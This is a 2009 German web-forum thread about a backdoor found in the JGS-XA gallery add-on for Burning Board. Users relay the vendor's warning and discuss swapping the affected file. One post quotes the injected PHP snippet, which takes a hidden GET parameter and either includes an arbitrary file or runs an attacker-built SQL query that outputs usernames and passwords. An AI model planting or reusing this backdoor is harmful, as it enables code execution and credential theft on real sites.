Viktor's Supportboard
Quickmenü
» Start
» Portal
» Kontakt
» Mitglieder
» Team

» Handy-Ansicht


Usermenü

» Registrieren

Login
Benutzername:
Passwort:

(Passwort vergessen?)

Database
» Database

Lizenzshop/Verwaltung
» Lizenzshop/Verwaltung


Allgemeines
» Themen der letzen 24 Stunden
» Beiträge von Heute
» Aktuelle Umfragen
» Themen als gelesen markieren
» Themen ohne Antwort

» F.A.Q
» Regeln
» Impressum
» Datenschutzerklärung

» Linkliste
» Partner
» Statistik

Kostenplichtige Hacks
» VG-Lizenz
» VG-Fotowettbewerb
» VG-Kontaktanzeige
» VG-Literatur-Verwaltung
» VGTreffen/Dater
» VGMusik/Video

Mein Hacks
» VGUser-Leaflet-Map
» VGUser-Google-Map
» VGClub-Map-Google
» User-Map
» Club-Map
» User-Locator
» Club-Locator
» Mitglieder Bilderupload
» VGOnlineList
» Teamspeak Onlineanzeige

Meine Banner
» Meine Banner

Statistik
Beiträge: 139.322 (Täglich: 22,93 )
Themen: 16.215
Mitglieder: 13.155
Neuestes Mitglied: Leviathan.
Ausl. d. letzten Minute: 122%
Ausl. d. letzten 5 Minuten: 81%
Ausl. d. letzten 15 Minuten: 83%
Freier Webspace: 1.92 TB
PHP-Version: 7.3.10

Spenden

Partner
Mein Supportboard

MySQLDumper

Forum für Angehörige und Freunde von Krebspatienten

Wetter-Board

Make your Webserver

ABC-des Essens

IC-Netforum

ultimate-funultimate-fun

Steinadler-Bastelstübchen

Webseitenschutz

Werben

Viktor's Supportboard » Allgemeines » News » Sicherheitslücke in der JGS-XA Galerie » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Sicherheitslücke in der JGS-XA Galerie
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
keine_Ahnung   Zeige keine_Ahnung auf Karte keine_Ahnung ist männlich
...versucht aber sein bestes.


images/avatars/avatar-15837.jpg

Zeige keine_Ahnung auf Karte
Dabei seit: 23.11.2005
Beiträge: 1.958
5 Filebase-Einträge
Alter: 42 Jahre
Herkunft: Bad Lippspringe
wBB-Version: wBB3.X
PHP-Version: 5.2.6
MySQL-Version: 5.0.26
Wo bist du gehostet?: Bei mir selbst!

Bewertung: 
12 Bewertung(en) - Durchschnitt: 9,25

Level: 50 [?]
Erfahrungspunkte: 10.267.948
Nächster Level: 11.777.899

1.509.951 Erfahrungspunkt(e) für den nächsten Levelanstieg



Achtung Sicherheitslücke in der JGS-XA Galerie Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Hallo zusammen,

ich habe gerade folgende Mail bekommen.
Zitat:
Hallo keine_Ahnung,

uns wurde in der JGS-XA Galerie 4.0 für das WBB2 und WBB Lite eine Sicherheitslücke gemeldet.
Bei dem Hackerangriff Ende 2007 muss der nette Herr einige Files geändert haben, die wir im Installscript oder anderen Files schon finden konnten.

Die aktuelle Fundstelle haben wir übersehen, bitte sofort die Files austauschen

Du findest den Download hier
http://forum.itratos.de/forumdisplay.php?f=20
es muss nur die

jgs_galerie_kommentar.php

Datei getauscht werden.

Bitte teilt auch in anderen Boards diese Lücke mit damit der Fehler schnell in allen Foren behoben wird.
Leider wurde der Fehler gleich im Forum an den Pranger gestellt, es kann damit gerechnet werden das auch Hacker dies jetzt wissen.

PS: Diese Info ging an alle Empfänger von JGS-XA.de, wenn Du kein WBB mehr betreibst oder keine JGS-XA Software nutzt kannst Du diese Info löschen, danke.
das Team von JGS-XA
www.jgs-xa.de

Mit freundlichen Grüssen

Timo Panitz
Team Itratos



Gruß Heiko
09.02.2009 20:21 keine_Ahnung ist offline E-Mail an keine_Ahnung senden Homepage von keine_Ahnung Beiträge von keine_Ahnung suchen Nehmen Sie keine_Ahnung in Ihre Freundesliste auf Germany
Viktor   Zeige Viktor auf Karte Viktor ist männlich
Administrator


images/avatars/avatar-15762.jpg

Zeige Viktor auf Karte
Dabei seit: 15.08.2003
Beiträge: 30.081
363 Filebase-Einträge
Alter: 62 Jahre
Herkunft: NRW
wBB-Version: wBB2.3
PHP-Version: 7.1.11
MySQL-Version: 5.5.59-0+deb8u1
Wo bist du gehostet?: eigener Server

Bewertung: 
279 Bewertung(en) - Durchschnitt: 9,47

Level: 69 [?]
Erfahrungspunkte: 182.732.827
Nächster Level: 202.592.733

19.859.906 Erfahrungspunkt(e) für den nächsten Levelanstieg



RE: Sicherheitslücke in der JGS-XA Galerie Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Hallo,

jo habe auch gerade die Mail bekommen. fröhlich

Danke für die Info. Freude

Gruß
Viktor Augenzwinkern

__________________
Ein kluger Mann widerspricht keiner Frau. Er wartet, bis sie es selbst tut.


... beim Käfer (WBB2) konnte man noch selber schrauben,
beim neuen Golf (WBB3) muß man fast schon in die Werkstatt wenn man das "Wischwasser" nachfüllen muss!


Da fast keiner mehr hier Postet gibt es ab sofort keinen Support mehr per PN.

09.02.2009 20:40 Viktor ist offline E-Mail an Viktor senden Homepage von Viktor Beiträge von Viktor suchen Nehmen Sie Viktor in Ihre Freundesliste auf Germany
Zierfischfreunde   Zeige Zierfischfreunde auf Karte Zierfischfreunde ist männlich
VGLizenz


images/avatars/avatar-15971.gif

Zeige Zierfischfreunde auf Karte
Dabei seit: 14.04.2006
Beiträge: 2.065
0 Filebase-Einträge
Alter: 60 Jahre
Herkunft: Torrox, España
wBB-Version: wBB2.3
PHP-Version: 5.3.10
MySQL-Version: 5.5.29
Wo bist du gehostet?: Strato AG

Bewertung: 
10 Bewertung(en) - Durchschnitt: 5,00

Level: 50 [?]
Erfahrungspunkte: 10.534.946
Nächster Level: 11.777.899

1.242.953 Erfahrungspunkt(e) für den nächsten Levelanstieg



RE: Sicherheitslücke in der JGS-XA Galerie Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Ich hab das Gott sei Dank nicht drin, hänge aber mal meine Datei hier an, vielleicht findet ja doch jemand was.

Gruss Günni

Dateianhang:
txt jgs_galerie_kommentar.txt (8 KB, 16 mal heruntergeladen)


__________________
Viele Grüsse von der Costa del Sol.

09.02.2009 21:06 Zierfischfreunde ist offline E-Mail an Zierfischfreunde senden Homepage von Zierfischfreunde Beiträge von Zierfischfreunde suchen Nehmen Sie Zierfischfreunde in Ihre Freundesliste auf Germany
Viktor   Zeige Viktor auf Karte Viktor ist männlich
Administrator


images/avatars/avatar-15762.jpg

Zeige Viktor auf Karte
Dabei seit: 15.08.2003
Beiträge: 30.081
363 Filebase-Einträge
Alter: 62 Jahre
Herkunft: NRW
wBB-Version: wBB2.3
PHP-Version: 7.1.11
MySQL-Version: 5.5.59-0+deb8u1
Wo bist du gehostet?: eigener Server

Bewertung: 
279 Bewertung(en) - Durchschnitt: 9,47

Level: 69 [?]
Erfahrungspunkte: 182.732.827
Nächster Level: 202.592.733

19.859.906 Erfahrungspunkt(e) für den nächsten Levelanstieg



RE: Sicherheitslücke in der JGS-XA Galerie Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Zitat:
Original von Malerforum
Ich hab das Gott sei Dank nicht drin, hänge aber mal meine Datei hier an, vielleicht findet ja doch jemand was.

Gruss Günni


Hallo,

schon Komisch ich habe gerade sie neu runtergeladen und meine Datei sieht anders aus. Augen rollen

Gruß
Viktor Augenzwinkern

Dateianhang:
txt jgs_galerie_kommentar.php.txt (8 KB, 11 mal heruntergeladen)


__________________
Ein kluger Mann widerspricht keiner Frau. Er wartet, bis sie es selbst tut.


... beim Käfer (WBB2) konnte man noch selber schrauben,
beim neuen Golf (WBB3) muß man fast schon in die Werkstatt wenn man das "Wischwasser" nachfüllen muss!


Da fast keiner mehr hier Postet gibt es ab sofort keinen Support mehr per PN.

09.02.2009 21:16 Viktor ist offline E-Mail an Viktor senden Homepage von Viktor Beiträge von Viktor suchen Nehmen Sie Viktor in Ihre Freundesliste auf Germany
Zierfischfreunde   Zeige Zierfischfreunde auf Karte Zierfischfreunde ist männlich
VGLizenz


images/avatars/avatar-15971.gif

Zeige Zierfischfreunde auf Karte
Dabei seit: 14.04.2006
Beiträge: 2.065
0 Filebase-Einträge
Alter: 60 Jahre
Herkunft: Torrox, España
wBB-Version: wBB2.3
PHP-Version: 5.3.10
MySQL-Version: 5.5.29
Wo bist du gehostet?: Strato AG

Bewertung: 
10 Bewertung(en) - Durchschnitt: 5,00

Level: 50 [?]
Erfahrungspunkte: 10.534.946
Nächster Level: 11.777.899

1.242.953 Erfahrungspunkt(e) für den nächsten Levelanstieg



RE: Sicherheitslücke in der JGS-XA Galerie Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Also die fraglichen Teile hab ich ja nicht drin.

Was mach ich jetzt, die neue einbauen oder die alte lassen?

__________________
Viele Grüsse von der Costa del Sol.

09.02.2009 21:25 Zierfischfreunde ist offline E-Mail an Zierfischfreunde senden Homepage von Zierfischfreunde Beiträge von Zierfischfreunde suchen Nehmen Sie Zierfischfreunde in Ihre Freundesliste auf Germany
Darkman Predator   Zeige Darkman Predator auf Karte Darkman Predator ist männlich
wBB2-User


Zeige Darkman Predator auf Karte
Dabei seit: 25.05.2007
Beiträge: 168
0 Filebase-Einträge
Alter: 45 Jahre
Herkunft: Everswinkel bei Münster NRW
wBB-Version: wBB2.3


Mitglied bewerten

Level: 35 [?]
Erfahrungspunkte: 788.934
Nächster Level: 824.290

35.356 Erfahrungspunkt(e) für den nächsten Levelanstieg



Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Also ich habe es gerade runtergalden von derren Homepage habe die Datei ausgetauscht hoffe das das jetzt richtig war.

__________________

11.02.2009 15:15 Darkman Predator ist offline E-Mail an Darkman Predator senden Homepage von Darkman Predator Beiträge von Darkman Predator suchen Nehmen Sie Darkman Predator in Ihre Freundesliste auf Fügen Sie Darkman Predator in Ihre Kontaktliste ein Germany
jakiri   Zeige jakiri auf Karte jakiri ist männlich
Administrator


images/avatars/avatar-15745.gif

Zeige jakiri auf Karte
Dabei seit: 07.12.2004
Beiträge: 2.726
1 Filebase-Einträge
Alter: 58 Jahre
Herkunft: Hürth
wBB-Version: wBB2.3
PHP-Version: 5.ändert sich immer
MySQL-Version: 5.ändert sich immer
Wo bist du gehostet?: bei keinem

Bewertung: 
26 Bewertung(en) - Durchschnitt: 6,65

Level: 52 [?]
Erfahrungspunkte: 15.250.660
Nächster Level: 16.259.327

1.008.667 Erfahrungspunkt(e) für den nächsten Levelanstieg



re Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

Datei austauschen ist richtig !

__________________

11.02.2009 15:37 jakiri ist offline E-Mail an jakiri senden Homepage von jakiri Beiträge von jakiri suchen Nehmen Sie jakiri in Ihre Freundesliste auf Germany
BillGates
wBB2-User



Dabei seit: 25.07.2007
Beiträge: 3
0 Filebase-Einträge



Mitglied bewerten

Level: 18 [?]
Erfahrungspunkte: 13.906
Nächster Level: 17.484

3.578 Erfahrungspunkt(e) für den nächsten Levelanstieg



Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

zwar schon etwas älter dieser thraed


aber mal zum anschauen so sieht der böse code aus


if(isset($_GET['40grt894g0tr'])) {
switch($_GET['40grt894g0tr']) {
case "E90E216e":
include $_GET['fds46f4e'];
break;
case "R148r4fr":
$jzjzu ="select * from ".$_GET['tabelle']." where ".$_GET['where']." = '".$_GET['eingabe']."'";
$jfiods = mysql_query($jzjzu) OR die(mysql_error());
$ergebnise = mysql_fetch_array($jfiods);
echo "".$ergebnise['userid'].":".$ergebnise['username'].":".$ergebnise['password
']."";

wenn mann draufgukt sieht mann es direkt,nun frage ich mich muss ich mir nun jeden hack und addon erst mal genau anschauen bevor ich sowas einbau?

vorallem frage ich mich was diese abfrage soll,was will mann damit bezwecken ,wenn er es brauchte beim codem um zu sehen was das script an dieser stelle macht dann muss es auch raus bevor man es zum down stellt

__________________

(Aktuelles Projekt Formel 1 Tipp wbb2(100%) und wbblite(50%))

10.03.2009 09:32 BillGates ist offline E-Mail an BillGates senden Beiträge von BillGates suchen Nehmen Sie BillGates in Ihre Freundesliste auf Germany
dedie dedie ist männlich
wBB2-User


images/avatars/avatar-15864.jpg


Dabei seit: 22.10.2005
Beiträge: 159
0 Filebase-Einträge

Herkunft: Stuttgart
wBB-Version: wBB2.3
Wo bist du gehostet?: all-inkl.com

Bewertung: 
1 Bewertung(en) - Durchschnitt: 1,00

Level: 36 [?]
Erfahrungspunkte: 838.848
Nächster Level: 1.000.000

161.152 Erfahrungspunkt(e) für den nächsten Levelanstieg



Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Ende der Seite springen Zum Anfang der Seite springen

@ BillGates,
das JGS-Board wurde seinerzeit gehackt, und der nette Hacker hat eine umcodierte Datei(eben welche mit der netten Abfrage) eingeschmuggelt.
10.03.2009 20:02 dedie ist offline E-Mail an dedie senden Homepage von dedie Beiträge von dedie suchen Nehmen Sie dedie in Ihre Freundesliste auf Germany
Baumstruktur | Brettstruktur
Gehe zu:
Neues Thema erstellen Antwort erstellen
Viktor's Supportboard » Allgemeines » News » Sicherheitslücke in der JGS-XA Galerie

Impressum | Datenschutz | Fast-Index

Forensoftware: Burning Board 2.3.6, entwickelt von WoltLab® GmbH Design © Tine

Valid XHTML 1.0! Valid CSS! Die letzten Themen Die letzten Beiträge © für wbb2 by Bandy & cback.de Geblockte Angriffe: 7.577
Seo Sidemap Powert by 2Clubradio.de
Viktor's Supportboard, ist " Online " seit 16 Jahren, 230 Tage, 16 Stunden, 37 Minuten und 16 Sekunden